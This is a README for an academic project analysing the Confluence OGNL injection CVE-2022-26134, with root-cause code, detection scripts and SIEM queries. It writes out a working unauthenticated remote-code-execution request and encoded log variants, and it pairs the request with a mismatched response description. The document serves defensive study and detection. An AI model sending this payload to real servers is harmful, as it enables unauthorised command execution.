## https://sploitus.com/exploit?id=B841D620-12F0-5E7F-99F9-80B1AE329253
# CVE-2022-26134 โ OGNL Injection in Atlassian Confluence
### Technical Analysis & Detection Engineering
> **Academic project** โ CYB625 Ethical Hacking & Penetration Testing
> Pace University, Seidenberg School of CSIS
---
## Summary
This repository contains my individual project analyzing **CVE-2022-26134**, a critical (CVSSv3 **9.8**) pre-authentication remote code execution vulnerability disclosed in Atlassian Confluence Server and Data Center on June 2, 2022.
The vulnerability originates from an **OGNL (Object-Graph Navigation Language) injection sink** in `ActionChainResult.java`. The WebWork framework derives the action namespace directly from the HTTP request URI and passes it through `TextParseUtil.translateVariables()`, which evaluates embedded `${...}` expressions as OGNL. Because OGNL can invoke arbitrary Java methods including `Runtime.exec()`, any unauthenticated attacker can execute OS commands against a reachable Confluence instance with a single HTTP request.
**In one line:** the framework trusted a field by name rather than by data origin โ and that structural mistake became unauthenticated RCE.
---
## What's in this repo
```
CVE-2022-26134-OGNL-Injection/
โโโ paper/
โ โโโ CVE-2022-26134_Technical_Paper.docx โ IEEE-style academic paper
โ
โโโ presentation/
โ โโโ CVE-2022-26134_Presentation.pptx โ Slide deck with evidence panels
โ
โโโ detection/
โ โโโ log_analyzer.py โ Python: OGNL detection in access logs
โ โโโ ioc_monitor.py โ Python: IOC-based log monitoring
โ โโโ sigma_rule.yml โ Sigma detection rule (SIEM-portable)
โ โโโ sample_logs/
โ โโโ confluence_access.log โ Synthetic log with exploitation evidence
โ
โโโ analysis/
โโโ exploit_flow.md โ Full attack flow documentation
```
---
## Vulnerability Quick Facts
| Field | Value |
|-------|-------|
| CVE ID | CVE-2022-26134 |
| CVSS v3 | **9.8 CRITICAL** |
| Product | Atlassian Confluence Server & Data Center |
| Auth Required | **None** |
| Vector | Network (unauthenticated, any HTTP method) |
| Impact | Code execution as Confluence OS user |
| Disclosed | June 2, 2022 (by Volexity, Memorial Day weekend IR) |
| Patched | June 3, 2022 |
| Observed payloads | BEHINDER, China Chopper, Cobalt Strike, Cerber, XMRig |
---
## Technical Root Cause
The vulnerable code path in `xwork-1.0.3-atlassian-10.jar`:
```java
// VULNERABLE โ ActionChainResult.java
public void execute(ActionInvocation invocation) {
if (this.namespace == null)
this.namespace = invocation.getProxy().getNamespace(); // โ URI here
OgnlValueStack stack = ActionContext.getContext().getValueStack();
String finalNamespace = TextParseUtil.translateVariables(
this.namespace, stack); // โ SINK: evaluates ${...} as OGNL
}
```
The patched version (June 3, 2022) removes the `translateVariables` call entirely:
```java
// PATCHED โ no OGNL evaluation
String finalNamespace = this.namespace;
String finalActionName = this.actionName;
```
**Real call stack** reproduced by Rapid7 on a live Confluence 7.13.6 test server:
```
ognl.Ognl.getValue(Ognl.java:333)
com.opensymphony.xwork.util.OgnlValueStack.findValue(OgnlValueStack.java:141) โ SINK
com.opensymphony.xwork.util.TextParseUtil.translateVariables(TextParseUtil.java:39)
com.opensymphony.xwork.ActionChainResult.execute(ActionChainResult.java:95) โ ENTRY
```
---
## Exploit Structure (Conceptual)
Evidence from Rapid7's published analysis of their test server (`10.0.0.28`):
**Request:**
```
GET /${@java.lang.Runtime@getRuntime().exec("id")}/ HTTP/1.1
Host: confluence.example.local
```
**Response (command output in header):**
```
HTTP/1.1 302
X-Cmd-Response: confluence
^^^^^^^^^^ โ output of 'whoami' โ server running as 'confluence' user
```
**Access log artifact** (always written โ forensic evidence):
```
[02/Jun/2022:16:02:13 -0700] 10.0.0.28 GET
/%24%7B%40java.lang.Runtime%40getRuntime%28%29.exec%28%22touch%20/tmp/r7%22%29%7D/
HTTP/1.1 302 20ms
```
> All exploit examples are reproduced from Rapid7's published technical analysis
> of their own isolated test environment. No systems were targeted.
---
## Detection Engineering
### Run the log analyzer
```bash
# Scan a Confluence access log for OGNL exploitation indicators
python3 detection/log_analyzer.py --log detection/sample_logs/confluence_access.log
# Export findings as JSON
python3 detection/log_analyzer.py \
--log detection/sample_logs/confluence_access.log \
--output findings.json
```
**Sample output:**
```
======================================================================
CVE-2022-26134 OGNL INJECTION โ LOG ANALYSIS REPORT
======================================================================
โ 39 finding(s) across 2 source IP(s)
โโ Source IP: 10.0.0.28 [28 finding(s), 23 CRITICAL]
โ [CRITICAL] OGNL interpolation trigger ${...}
โ Timestamp : 02/Jun/2022:16:02:13 -0700
โ Method : GET
โ ATT&CK : Initial Access / T1190 โ Exploit Public-Facing Application
โ URI (dec) : /${@java.lang.Runtime@getRuntime().exec("touch /tmp/r7")}/
...
```
### Run the IOC monitor
```bash
# Scan for IOC matches (IPs, user agents, URI patterns)
python3 detection/ioc_monitor.py --log detection/sample_logs/confluence_access.log
# Tail a live log file
python3 detection/ioc_monitor.py \
--log /opt/atlassian/confluence/logs/conf_access_log.$(date +%F).log \
--tail
```
### Sigma rule
`detection/sigma_rule.yml` is a full Sigma detection rule that converts to:
| Platform | Query |
|----------|-------|
| **Splunk** | `index=web (uri_path="*%24%7B*" OR uri_path="*${@java*")` |
| **Elastic KQL** | `http.request.uri: (*%24%7B* OR *${@java*)` |
| **Sentinel KQL** | `W3CIISLog \| where csUriStem contains "%24%7B"` |
---
## MITRE ATT&CK Coverage
| Tactic | Technique | Description |
|--------|-----------|-------------|
| Initial Access | T1190 | Exploit Public-Facing Application |
| Execution | T1059 | Command and Scripting Interpreter (OGNL โ Runtime.exec) |
| Persistence | T1505.003 | Web Shell (BEHINDER, China Chopper) |
| Defense Evasion | T1027 | Obfuscated Files (BEHINDER in-memory) |
| Discovery | T1595 | Active Scanning (pre-disclosure reconnaissance) |
---
## Key Lessons
1. **Expression languages are eval()** โ any data path to an EL evaluator (OGNL, SpEL, MVEL) is one routing mistake from RCE.
2. **Trust by origin, not by name** โ the `namespace` field was "internal" in name only; its value came from the URI.
3. **Remove sinks, don't filter inputs** โ Atlassian's patch removed the `translateVariables` call, not the input. Eliminating the dangerous API is more durable than regex filtering.
4. **Disclosure windows are hours** โ exploitation pre-dated the advisory. WAF rules and network isolation must be ready alongside patches.
---
## References
- Atlassian. (2022). *Confluence Security Advisory 2022-06-02 โ CVE-2022-26134*. https://confluence.atlassian.com/doc/confluence-security-advisory-2022-06-02-1130377146.html
- Volexity. (2022). *Zero-Day Exploitation of Atlassian Confluence*. https://www.volexity.com/blog/2022/06/02/zero-day-exploitation-of-atlassian-confluence/
- Rapid7. (2022). *Active Exploitation of Confluence CVE-2022-26134*. https://www.rapid7.com/blog/post/2022/06/02/active-exploitation-of-confluence-cve-2022-26134/
- Palo Alto Networks Unit 42. (2022). *Threat Brief: Atlassian Confluence RCE*. https://unit42.paloaltonetworks.com/cve-2022-26134-atlassian-code-execution-vulnerability/
- MITRE Corporation. (2022). *CVE-2022-26134*. https://vulners.com/cve/CVE-2022-26134
- OWASP Foundation. (2021). *A03:2021 โ Injection*. https://owasp.org/Top10/A03_2021-Injection/
- OWASP Foundation. (n.d.). *Expression Language Injection*. https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection
---
## License & Disclaimer
This repository is for **educational and academic purposes only.**
All exploitation examples reference Rapid7's and Volexity's published analyses of their own isolated test environments. No unauthorized systems were targeted in the preparation of this project.
Detection scripts and Sigma rules are provided as defensive tools. Use only against systems you own or have explicit written authorization to test.
---
*CYB625 โ Ethical Hacking & Penetration Testing | Pace University, Seidenberg School of CSIS*